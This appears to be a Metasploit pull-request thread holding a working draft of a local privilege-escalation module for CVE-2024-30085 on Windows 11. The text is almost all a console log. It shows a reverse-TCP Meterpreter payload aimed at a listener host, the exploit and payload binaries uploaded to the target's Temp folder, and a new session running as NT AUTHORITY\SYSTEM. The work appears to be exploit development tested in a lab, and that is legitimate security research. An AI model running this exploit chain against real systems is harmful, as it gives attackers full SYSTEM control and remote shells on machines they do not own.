Working Draft for cve-2024-30085

[bwatters-r7]

This is a draft with just the working exe for CVE-2024-30085

Closes #19768
For future me, this is Windows 11 23H2 8EA9.

[bwatters-r7]

msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : WIN11_23H2_8EA9
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: WIN11_23H2_8EA9\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > use exploit/windows/local/cve_2024_30085_cloud_files
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2024_30085_cloud_files) > show options

Module options (exploit/windows/local/cve_2024_30085_cloud_files):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   EXECUTE_DELAY    3                yes       The number of seconds to delay between file upload and exploit launch
   EXPLOIT_NAME                      no        The filename to use for the exploit binary (%RAND% by default).
   EXPLOIT_TIMEOUT  60               yes       The number of seconds to wait for exploit to finish running
   PAYLOAD_NAME                      no        The filename for the payload to be used on the target host (%RAND%.exe by default).
   SESSION                           yes       The session to run this module on
   WRITABLE_DIR                      no        Path to write binaries (%TEMP% by default).


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows x64



View the full module info with the info, or info -d command.

msf6 exploit(windows/local/cve_2024_30085_cloud_files) > set session 1
session => 1
msf6 exploit(windows/local/cve_2024_30085_cloud_files) > run
[*] Started reverse TCP handler on 10.5.135.201:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Attempting to PrivEsc on WIN11_23H2_8EA9 via session ID: 1
[*] Exploit uploaded on WIN11_23H2_8EA9 to C:\Users\msfuser\AppData\Local\Temp\uMdIlvIvaW.exe
[*] Payload (7168 bytes) uploaded on WIN11_23H2_8EA9 to C:\Users\msfuser\AppData\Local\Temp\CBuglYAuy.exe
[!] This exploit requires manual cleanup of the payload C:\Users\msfuser\AppData\Local\Temp\CBuglYAuy.exe
[*] Sending stage (203846 bytes) to 10.5.132.111
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.111:49723) at 2025-01-29 17:33:12 -0600
[-] Caught timeout.  Exploit may be taking longer or it may have failed.
[*] C:\Users\msfuser\AppData\Local\Temp\uMdIlvIvaW.exe already exists on the target. Deleting...
[-] Unable to delete C:\Users\msfuser\AppData\Local\Temp\uMdIlvIvaW.exe

meterpreter > sysinfo
Computer        : WIN11_23H2_8EA9
OS              : Windows 11 (10.0 Build 22631).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >